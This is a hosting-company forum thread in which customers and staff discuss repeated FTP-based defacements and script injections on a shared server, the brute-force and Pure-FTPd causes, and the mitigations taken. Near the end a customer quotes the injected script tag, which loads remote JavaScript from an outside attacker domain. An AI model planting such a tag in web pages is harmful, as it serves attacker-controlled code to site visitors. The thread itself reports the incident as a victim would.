How is security of the sever

[eUKhost.com]

Hello Brian,

Have you faced any problems in last 24 hours ?

I am mainly looking for FTP problems and injections so let me know if you had any problems in last 24 hours.

[Brian]

Just around 24hrs ago I noticed a problem but just reuploaded my website hosting. Nothing has happened since. Good luck with stoping all this BS!

[DavidAllen]

Index.html changed again - at 23:12 last night (server time is 1 hr behind so thats 00:12 this am) Whole load of pharmacy links to www.math.uchicago.edu/

So much for new secure server

Regards
David

[Eidolon]

It would be worth running an antivirus scan on your computer to ensure that there isn't any keylogging software installed which could allow hackers to discover your login/FTP details. Also it would be worth checking the website hosting affected for any files which could be used by hackers to gain entry to the website hosting. If other website hostings aren't affected then I'm inclined to think that the hackers have found away into your website hosting rather than the server.

[DavidAllen]

I don't think it's just my website hosting - i just checked some other website hostings on Jaguar (not mine) an they have similar added code
David

Ps could anyone else on Jaguar confirm this?

[ChrisMcQuillan]

Something someone suggested to me was to change permissions on the affected files to 444 from 644. I certainly haven't received an attack since doing this (although, this does coincide with being moved servers).

[ChrisMcQuillan]

Quote:

Originally Posted by Eidolon

It would be worth running an antivirus scan on your computer to ensure that there isn't any keylogging software installed which could allow hackers to discover your login/FTP details. Also it would be worth checking the website hosting affected for any files which could be used by hackers to gain entry to the website hosting. If other website hostings aren't affected then I'm inclined to think that the hackers have found away into your website hosting rather than the server.

The only problem with this is that I was receiving identical injections. I even changed all my FTP logins that could have been responsible and it happened again. Hence I'm inclined to think its a server issue.

My dad (also a webmaster) had a similar problem on a different host a couple of years back. It was always his index.php/html that got targetted. Thus I think its a script targetting index/other crucial files.

He eventually countered the problem using 444 permissions, but this doesn't render the server any more secure unforunately.

[eUKhost.com]

it was kernel exploit when your dad experienced this problem but this time its an FTP exploit. This exploit has been discovered recently and thats the reason it is taking some time to get a permanent solution for it but make sure that you don't leave anything with 777 permission as of now as 777 permission as an open invitation for injections.

If you see anything suspicious then let me know that in detail as I would like to investigate how this has been possible. OS, software version and kernel version is new so serverwide injection is not possible as of now.

[DavidAllen]

I supplied details at 08:25 this morning on ticket #ENS-95952-191 - no reponse as yet!
Do you want more details?

[eUKhost.com]

your ticket was moved in ownership of Nick ( our CTO ) and he will need some time to trace how exactly those were injected.


If you need a reply then i will ask someone to reply but it wont help until the investigation work of Nick gets completed.

[DavidAllen]

Don't need a reply - nice to know something is being done though.
Thanks

[deep]

Quote:

Originally Posted by Rock

Deep,
Such incidents are most of the time rumours/hoaxes, nothing to worry about them.
Our servers are well equipped to fight against such hack attempts & to keep them at bay. We have various tools (firewalls) running on our servers to monitor such events. None of our servers have been yet hacked, but unfortunately (as hairyfreak said) few website hostings are hacked due to insecure permissions set on files by their owners/webadmins.
If you received any such email from the hackers, please have it forwarded to our support dept.

Oh, what's going on here

Thank you , I don't know what happened to jaguar server or any defaces, on our website hostings we have more than 40000 users, emails and personal information , defacing the first page is just something like static hacking ,fortunately till now we did'nt have any deface, I worry about database and personal information of users, you know if they can access the files so its easy to read sources and extract db password, oh I can't even think about that,

I hope nothing happen in future,
Thanks

[DavidAllen]

Received this reply from Nick about the latest attacks on Jaguar

Quote:

Hello David,

I apologize for replying late.

Yes it was done using the same method of BFD and password crack.

Pure-FTPd is a fast, production-quality and standards-compliant FTP server.
Pure-FTPd contains a bug in the accept_client function handling the setup of new connections. When the maximum number of connections is reached an attacker could exploit this vulnerability to perform a Denial of Service attack or Brute Force Attack. There is no known workaround at this time.
The only solution is to upgrade the pure-ftpd version to latest stable version pure-ftpd v1.0.21 which is already done.

Also, we have installed the BFD on sever and reduced the number connection per IP address per sec. This will block the IP if there are more than 4 connections per IP per sec.

I am still investigating it and would update you if there any configuration changes made on server.

Regards,
NickJ
Senior Admin
Support Team.

So I guess the attacks may well continue - and all we can do is check website hostings every day and perhaps change passwords every day. As I have well over 60 website hostings on this server that is a lot of checking and cleaning to do every day - my business is starting to suffer due to all this extremely time consuming extra work!
David

Ps What is BFD (i thought it was Brute Force something - but as Nick says its installed on the server I guess not)

[Eidolon]

BFD - Brute Force Detection

[eUKhost.com]

Quote:

Originally Posted by deep

Oh, what's going on here

Thank you , I don't know what happened to jaguar server or any defaces, on our website hostings we have more than 40000 users, emails and personal information , defacing the first page is just something like static hacking ,fortunately till now we did'nt have any deface, I worry about database and personal information of users, you know if they can access the files so its easy to read sources and extract db password, oh I can't even think about that,

I hope nothing happen in future,
Thanks

I can understand questions which have got raised in your mind due to this problem but let me clarify that the database is safe and will remain so. FTP users can never access database and it is next to impossible to inject or read entries in MySQL Server databases without authentication of the database owner.

you don't need to be so concerned about privacy of your data as we are here to protect your private data. I do agree that public content was affected due to this problem but none of your private data was tampered.

[DavidAllen]

As responsible hosts should you be sending an email to all admin contacts for domains on that sever to:
a) Tell them about the problem
b) Ask them to clean their sites
c) Suggest they change password
d) Check regularly for new attacks
e) Check that no ftp accounts have been added
f) Reassure them about data integrity

Whilst some of the stuff is essentially harmless (broken links to script files) it might not always be. The rest of the stuff is not harmless to have on your website hosting - it can lead, as we have seen, to being blacklisted by Google, harming your companies reputation (search for my company on Google in russian and you get thousands of porn results!! - lucky i'm not planning on expanding to Russia ). So cleaning website hostings is essential.

David

[eUKhost.com]

Injection occurred on less than 30 website hostings on the server so its not feasible to bother all customers. As a responsible host its our responsibility to create no inconvenience for customers so every 24 - 48 hours we run script that checks iframe injection and we manually replace if something new was found.

As of now the volume has reduced and seems like the team putting its efforts on our server is loosing its patience now as all their IPs have got blocked on the server.

some of our customers know how we take care of our jobs as our support team emails them and phone support staff calls all customers on respective server when something happens on serverside resulting in problems for all customers on that particular server.

[DavidAllen]

Well the script injection looks like to have occurred on a lot more than 30 website hostings. I know that the script file it points to doesn't appear to be there at the moment - but there is nothing to stop them adding it to the server at gomyron.com - and then anything could be being served up to peoples browsers.
And there are still some iframe tags out there live still
David

[eUKhost.com]

I've personally ran some commands to see how many website hostings had iframe injection and it was surely below 30. I never took any screenshot to prove my words.

please explain whats wrong with gomyron.com as this domain seems to be hosted somewhere else.

[DavidAllen]

The following lines have been added to quite a few sites


script type="text/javascript" language="JavaScript" src="http://jsp.gomyron.com/functions.js.php?type=popexit&link=http://gomyron.com/MTU1NTI=/2/4811//"></script>

Which like i say could do anything - id doesn't cos script doesn't appear to be there at the moment - but the bad guys could put it there - to do whatever they want.

I'm sure I've seen that on more than 30 sites